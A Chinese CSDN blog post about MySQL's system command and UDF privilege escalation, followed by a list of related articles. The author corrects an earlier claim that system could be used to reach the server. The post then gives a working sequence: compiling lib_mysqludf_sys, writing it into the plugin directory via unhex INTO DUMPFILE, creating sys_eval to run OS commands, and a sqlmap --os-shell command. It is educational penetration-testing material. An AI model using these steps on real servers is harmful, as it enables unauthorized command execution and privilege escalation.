mysql system()_MySQL的system命令在渗透测试中的使用以及UDF提权

最新推荐文章于 2022-11-15 23:53:49 发布
最新推荐文章于 2022-11-15 23:53:49 发布
阅读量1.3k 收藏
点赞数
文章标签: mysql system()
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39692253/article/details/113138154
版权

声明:下面引用关于SYSTEM的东西是自己之前的内容,是自己没有研究透导致的错误结论:有了错就要改,做技术的不能弄虚作假,时时刻刻要求自己要谨慎,虽然我的博客没人看,但是也要向所有已经看到的人道歉,错了就是错了。

说明:

错误点:SYSTEM执行的是MYSQL-CLI客户端自己所在机器的命令,也就是你使用mysql命令行方式连接到对端后,使用SYSTEM执行的还是自己所在机器的指令。比如你system whoami,你会发现是你自己的主机账户名。所以无法用在渗透过程的当中,特此声明。

一、MySQL中的system命令

在MySQL 5.x中增加了system命令,简单的符号是\!,从而使MySQL可以执行系统的命令

1 mysql> system echo "12345"

2 12345

3b7a9dbd5df8614c0f1cf172a7cdc123.png

因为突发奇想,可以使用这个办法反弹shell

24bdf85f199add88e946ddf3e8e7f415.png

结果OK:

e28f54ae859da2bd2b59a368cb2cf09a.png

尝试和select拼接执行,这样是成功的

700c01452e87d47301a52531f015dfec.png

想到这里其实可以拼接在SQL注入语句中执行OS命令,或者能连上MySQL之后直接执行OS命令反弹shell。

二、MySQL UDF提权

这里按照linux类操作系统举例了,服务器端用windows真的没意思了,虽然还有很多。https://github.com/mysqludf/lib_mysqludf_sys解压后进入(git clone后直接进入)目录:

1 gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so

如果遇到报错:

1 In file included from lib_mysqludf_sys.c:40:2 /usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory

可以做如下修改:修改/usr/include/mysql/my_global.h文件,注释626行后重新编译。并使用Hex.hta获取16进制。

1 mysql> show variables like '%plugin%';2 +---------------+-------------------------+

3 | Variable_name | Value |

4 +---------------+-------------------------+

5 | plugin_dir | /usr/lib64/mysql/plugin |

6 +---------------+-------------------------+

7 1 row in set (0.00sec)8

9 mysql> select *from func; #检查是否已经有人导出过了10 mysql> select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';11 Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目录的写入权限12

13 mysql> create function sys_eval returns string soname 'mysqludf.so';14 Query OK, 0 rows affected (0.00sec)15

16 mysql> select sys_eval('whoami');17 +--------------------+

18 | sys_eval('whoami') |

19 +--------------------+

20 |mysql21 |

22 +--------------------+

23 1 row in set (0.03sec)24

25 mysql> select *from func;26 +----------+-----+-------------+----------+

27 | name | ret | dl | type |

28 +----------+-----+-------------+----------+

29 | sys_eval | 0 | mysqludf.so | function |

30 +----------+-----+-------------+----------+

31 1 row in set (0.00sec)32

33 mysql> drop functionsys_eval;34 Query OK, 0 rows affected (0.00sec)35

36 mysql> select *from func;37 Empty set (0.00 sec)

或者使用sqlmap 执行提权:

1 #sqlmap -d "mysql://root:toor@192.168.99.213:3306/test" --os-shell2 #test的地方是database name

weixin_39692253
关注
MySQL UDF 提权
small_cat's home
10-22 1956
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 无法方便实现的功能,其添加的新函数都可以在 SQL 语句调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
sqlmap mysql udf提权_MySQL数据库提权UDF
weixin_39683172的博客
01-30 540
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql无法方便实现的功能,其添加的新函数都可以在sql语句调用,就像调用本机函数一样。windows下udf提权的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
mysql system命令_mysql命令
weixin_39765869的博客
01-27 439
关闭防火墙和selinux:systemctl stop firewalld.servicesetenforce 0永久关闭防火墙和selinux:systemctl disable firewalld.servicesed -i ‘/^SELINUX/s#enforcing#disabled#g’ /etc/selinux/config安装wget:yum install -y wget国内yu...
mysql系统命令,mysql系统命令
weixin_39797693的博客
01-29 53
I am in MySQL and would like to change the current working directory. I tried to execute:mysql> system cd './my_dir'However, this does not seem to work. Has anyone run into a similar problem?解决方案Sy...
mysql system()_mysql5.x的system函数认识纠正
weixin_30131443的博客
01-18 220
今天遇到一服务器,passwd文件内mysql这个用户是有shell的。 [/var/lib/mysql/]$ cat /etc/passwd |grep mysqlmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 想提权,但不想反弹,考虑着直接ssh过去,mysql的home目录为 /var/lib/mysql 如果能建一个今天遇到一服务器,...
mysql engine查看_MySQL锁定状态查看命令
weixin_39816027的博客
01-27 198
1 show processlist;SHOW PROCESSLIST显示哪些线程正在运行。您也可以使用mysqladmin processlist语句得到此信息。如果您有SUPER权限,您可以看到所有线程。否则,您只能看到您自己的线程(也就是,与您正在使用MySQL账户相关的线程)。如果有线程在update或者insert 某个表,此时进程的status为updating 或者 sending...
mysql 执行系统命令
说文科技,做有态度的研究。
01-22 1万+
mysql 执行系统命令 1.需求 如何在mysql命令行界面操作底层系统呢? 只需要在mysql命令行界面使用system + linux命令即可。 2.命令 2.1 查看当前文件下的文件 mysql> system ls; appmetadatadb_20181210.sql deleteDataInExtractdb.sh lib my.cnf_2018...
MySQL提权——udf提权
hackzkaq的博客
04-11 6534
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
109.网络安全渗透测试—[权限提升篇7]—[Windows Mysql UDF提权]
qwsn
07-05 2623
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)在mysql可以使用udf自定义函数进行提权udf = user defined function 用户自定义函数。(2)对于自定义的函数,在mysql5.1版本以后就需要放在插件插件目录 /lib/plugin ,文件后缀微dll,c语言编写。(3)udf提权的位数,取决于操作系统位数,与mysql位数无关。​ 我们通过文件上传+文件包含获得了一个webshell,但是此时的权限很低,与此同时还获得了靶机MySQL的连接
linux下 udf提权_MYSQL提权--UDF提权
weixin_35507450的博客
01-17 1267
前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限什么是UDFudf(Userdefined function)是用户自定义函数在mysql函数是什么,比如mysql常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REALSTRING ...
mysql system()_5.3 Mysql System 数据库
weixin_36296325的博客
01-18 656
参考官方文档:mysql数据库是系统数据库。 它包含存储MySQL服务器运行时所需的信息的表。mysql数据库的表分为以下几类:--除非另有说明,否则系统表使用MyISAM存储引擎。Grant System Tables这些系统表包含有关用户帐户的授权信息以及他们拥有的权限:user: 用户帐户,全局权限和其他非特权列。db: 数据库级别权限tables_priv:表级别权限columns_pr...
Mysql执行系统命令mysql提示符下执行操作系统命令
qq_45844443的博客
10-27 3033
Mysql执行系统命令mysql提示符下执行操作系统命令 实现方法: 在mysql提示符下,输入system后面接要执行的操作系统命令就可以了。 system (commands); 例子: system pwd; system ls; system ll; 但是这样的使用无法在window下使用(本人测试为只有linux环境下才可以) ...
MySQL的system命令渗透测试使用以及UDF提权
weixin_30810239的博客
01-31 302
声明:下面引用关于SYSTEM的东西是自己之前的内容,是自己没有研究透导致的错误结论:有了错就要改,做技术的不能弄虚作假,时时刻刻要求自己要谨慎,虽然我的博客没人看,但是也要向所有已经看到的人道歉,错了就是错了。 说明: 错误点:SYSTEM执行的是MYSQL-CLI客户端自己所在机器的命令,也就是你使用mysql命令行方式连接到对端后,使用SYSTEM执行的还是自己所在机器的指令。比如你sy...
mysql system函数_mysql函数大全
weixin_33881426的博客
01-19 803
MySQL函数大全及用法示例1、字符串函数ascii(str)返回字符串str的第一个字符的ascii值(str是空串时返回0)mysql> select ascii('2');-> 50mysql> select ascii(2);-> 50mysql> select ascii('dete');-> 100ord(str)如果字符串str句首是单字节返回与a...
mysql 系统常用命令_mysql常用的系统命令整理
weixin_36168780的博客
01-21 76
##指定条件的参数设置查询,例如查询以log_slave开头的参数设置。show variables like 'log_slave%' ;##查看是否开启了慢查询日志;ON代表开启。可以在线打开。set global slow_query_log = 1;show variables like 'slow_query_log';## 查看慢查询日志的路径。show variables like ...
Mysql通过system命令调用系统shell命令
热门推荐
CleverCode的博客
08-07 1万+
CleverCode发现可以通过system + 系统shell命令。来执行一些系统方法shell命令。 1 ? 显示帮助。system (\!) Execute a system shell command. system date;系统日期。 sytem pwd;system whoami;system clear;等 技术交流 Clever...
mysql system命令_Windows环境下通过MySQL以SYSTEM身份执行系统命令 | 学步园
weixin_33437894的博客
01-19 250
前段时间出了两个关于MySQL的漏洞《MySQL CREATE FUNCTION功能mysql.func表允许注入任意函数库漏洞》、《MySQL CREATE FUNCTION功能libc函数库允许执行任意代码漏洞》,仔细研究这两个漏洞后,可以得知MySQL的两大功能:²第一:可以通过MySQL上传二进制文件,例如自己编写的UDF DLL;²第二:可以通过注册UDF DLL自写的Function...
MySQL的system命令显示的是服务端的信息?
最新发布
gjc592的博客
11-15 772
点击上方蓝字关注我MySQL的system命令很多时候可以方便查看操作系统上的相关信息,例如查看文件,查看网卡信息,查看日志信息等,没必要退出MySQL客户端。但是,有些同学会疑惑,如果我是远程连接的其他机器的数据库,那么system返回的结果是当前客户端本机的还是服务端的机器上的信息呢?1.system命令演示很多时候,我们在MySQL客户端操作的时候,会查看操作系统上的一些信息,但是又不想...
system+执行mysql命令_Windows环境下通过MySQL以SYSTEM身份执行系统命令
weixin_39980841的博客
02-04 506
前段时间出了两个关于MySQL的漏洞《MySQL CREATE FUNCTION功能mysql.func表允许注入任意函数库漏洞》、《MySQL CREATE FUNCTION功能libc函数库允许执行任意代码漏洞》,仔细研究这两个漏洞后,可以得知MySQL的两大功能:²第一:可以通过MySQL上传二进制文件,例如自己编写的UDF DLL;²第二:可以通过注册UDF DLL自写的Function...
MySQL提权工具UDF使用教程与安全风险
资源摘要信息:"mysql.zip_ROOT_mysql提权_udf_udf mysql_提权" 该资源是一个压缩包文件,名为"mysql.zip",主要包含了利用MySQL的用户定义函数(UDF)进行系统提权的方法。具体来说,这里面涉及到的是获得MySQL数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值